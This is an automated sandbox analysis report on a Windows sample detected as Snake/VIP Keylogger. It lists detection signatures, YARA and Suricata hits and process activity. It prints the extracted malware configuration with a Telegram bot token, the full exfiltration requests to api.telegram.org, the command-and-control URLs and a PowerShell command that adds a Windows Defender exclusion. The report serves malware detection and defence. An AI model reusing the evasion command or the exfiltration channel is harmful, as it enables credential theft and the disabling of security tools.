
Windows Analysis Report
299371485_14108825808_1736351479899.exe

Overview

General Information

Sample name: 299371485_14108825808_1736351479899.exe
Analysis ID: 1596649
MD5: a707e0ef919ba6b9d670ffdd32f1d4a4
SHA1: babe62daf8b14c67a1a31b75f282a05b5189fe61
SHA256: f0e65a838c01e4741493c605aab2232854d22a14d913374a2c61f083b35d7aa7
Tags: exe, user-lowmal3

Detection

ReverseShell, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected ReverseShell
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 299371485_14108825808_1736351479899.exe (PID: 4876 cmdline: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe" MD5: A707E0EF919BA6B9D670FFDD32F1D4A4)
    • powershell.exe (PID: 2616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1548 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041"}
{"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
Source | Rule | Description | Author
00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_ReverseShell | Yara detected ReverseShell | Joe Security
00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
Source | Rule | Description | Author | Strings
0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack | JoeSecurity_ReverseShell | Yara detected ReverseShell | Joe Security | -
0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | -
0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security | -
0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security | -
0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown | matched strings listed below
                    • 0x2b43b:$a1: get_encryptedPassword
                    • 0x2b750:$a2: get_encryptedUsername
                    • 0x2b24b:$a3: get_timePasswordChanged
                    • 0x2b354:$a4: get_passwordField
                    • 0x2b451:$a5: set_encryptedPassword
                    • 0x2caf7:$a7: get_logins
                    • 0x2ca5a:$a10: KeyLoggerEventArgs
                    • 0x2c6bf:$a11: KeyLoggerEventArgsEventHandler

                    System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ParentImage: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe, ParentProcessId: 4876, ParentProcessName: 299371485_14108825808_1736351479899.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ProcessId: 2616, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ParentImage: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe, ParentProcessId: 4876, ParentProcessName: 299371485_14108825808_1736351479899.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe", ProcessId: 2616, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-22T09:48:10.635528+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49716 | 104.21.16.1 | 443 | TCP
2025-01-22T09:48:11.877293+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49727 | 104.21.16.1 | 443 | TCP
2025-01-22T09:48:15.657479+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49756 | 104.21.16.1 | 443 | TCP
2025-01-22T09:48:08.655179+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49712 | 158.101.44.242 | 80 | TCP
2025-01-22T09:48:10.030043+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49712 | 158.101.44.242 | 80 | TCP
2025-01-22T09:48:11.311358+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49722 | 158.101.44.242 | 80 | TCP
2025-01-22T09:48:27.584593+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49844 | 149.154.167.220 | 443 | TCP
2025-01-22T09:48:20.381908+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49789 | 149.154.167.220 | 443 | TCP

                    AV Detection

Source: 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat_id": "-4732682041", "Version": "4.4"}
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack; Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U", "Chat id": "-4732682041"}
Source: 299371485_14108825808_1736351479899.exe; Virustotal: Detection: 29%
Source: 299371485_14108825808_1736351479899.exe; ReversingLabs: Detection: 21%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: 299371485_14108825808_1736351479899.exe; Joe Sandbox ML: detected

                    Location Tracking

Source: unknown; DNS query: name: reallyfreegeoip.org
Source: 299371485_14108825808_1736351479899.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.6:49713 version: TLS 1.0
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49789 version: TLS 1.2
Source: 299371485_14108825808_1736351479899.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: HQYI.pdbSHA256; source: 299371485_14108825808_1736351479899.exe
Source: Binary string: HQYI.pdb; source: 299371485_14108825808_1736351479899.exe
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe; Code function: 4x nop then jmp 0D750941h; function: 0_2_0D750D95
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe; Code function: 4x nop then jmp 0D750941h; function: 0_2_0D750DBC
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe; Code function: 4x nop then jmp 0159FC31h; function: 6_2_0159F979
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe; Code function: 4x nop then jmp 0159F475h; function: 6_2_0159F2D8
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe; Code function: 4x nop then jmp 0159F475h; function: 6_2_0159F4C4

                    Networking

Source: Network traffic; Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49844 -> 149.154.167.220:443
Source: Network traffic; Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49789 -> 149.154.167.220:443
Source: unknown; DNS query: name: api.telegram.org
Source: Yara match; File source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1; Host: reallyfreegeoip.org
Source: global traffic; HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:855271%0D%0ADate%20and%20Time:%2022/01/2025%20/%2015:53:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20855271%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1; Host: api.telegram.org; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1; Content-Type: multipart/form-data; boundary=------------------------8dd3b6796ff3d52; Host: api.telegram.org; Content-Length: 584
Source: Joe Sandbox View; IP Address: 149.154.167.220
Source: Joe Sandbox View; IP Address: 104.21.16.1
Source: Joe Sandbox View; IP Address: 158.101.44.242
Source: Joe Sandbox View; JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown; DNS query: name: checkip.dyndns.org
Source: unknown; DNS query: name: reallyfreegeoip.org
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49722 -> 158.101.44.242:80
Source: Network traffic; Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49712 -> 158.101.44.242:80
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49716 -> 104.21.16.1:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49727 -> 104.21.16.1:443
Source: Network traffic; Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49756 -> 104.21.16.1:443
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;); Host: checkip.dyndns.org; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1; User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;); Host: checkip.dyndns.org
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic; DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic; DNS traffic detected: DNS query: api.telegram.org
Source: unknown; HTTP traffic detected: POST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1; Content-Type: multipart/form-data; boundary=------------------------8dd3b6796ff3d52; Host: api.telegram.org; Content-Length: 584
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx/1.18.0; Date: Wed, 22 Jan 2025 08:48:20 GMT; Content-Type: application/json; Content-Length: 55; Connection: close; Strict-Transport-Security: max-age=31536000; includeSubDomains; preload; Access-Control-Allow-Origin: *; Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://aborters.duckdns.org:8081
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://anotherarmy.dns.army:8081
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://checkip.dyndns.org/q
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2217732877.00000000029D7000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003071000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://varders.kozow.com:8081
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.000000000311A000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://api.telegram.org/bot
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, 299371485_14108825808_1736351479899.exe, 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.ecosia.org/newtab/
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4626221410.0000000004091000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 299371485_14108825808_1736351479899.exe, 00000006.00000002.4622133854.0000000003127000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.office.com/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown | Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49789 version: TLS 1.2
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.299371485_14108825808_1736351479899.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.299371485_14108825808_1736351479899.exe.433c220.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.299371485_14108825808_1736351479899.exe.437ec40.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000002.4617089897.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2219355172.000000000433C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 4876, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: 299371485_14108825808_1736351479899.exe PID: 6240, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 0_2_0272D3C4
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 0_2_0D752AA8
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159C146
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_01597118
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159A088
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_01595362
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159D278
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159C468
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159C738
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159F979
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159E988
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_015969A0
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_01593B95
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159CA08
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159CCD8
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159CFAA
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_01593E09
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_0159E97A
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_015929EC
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_01593AA1
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F0AFD0
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F0DE4B
Source: C:\Users\user\Desktop\299371485_14108825808_1736351479899.exe | Code function: 6_2_06F04A00
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2222946513.0000000004EE0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2219355172.00000000037A9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs 299371485_14108825808_1736351479899.exe
Source: 299371485_14108825808_1736351479899.exe, 00000000.00000002.2217732877.00000000029D7000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs 299371485_14108825808_1736351479899.exe
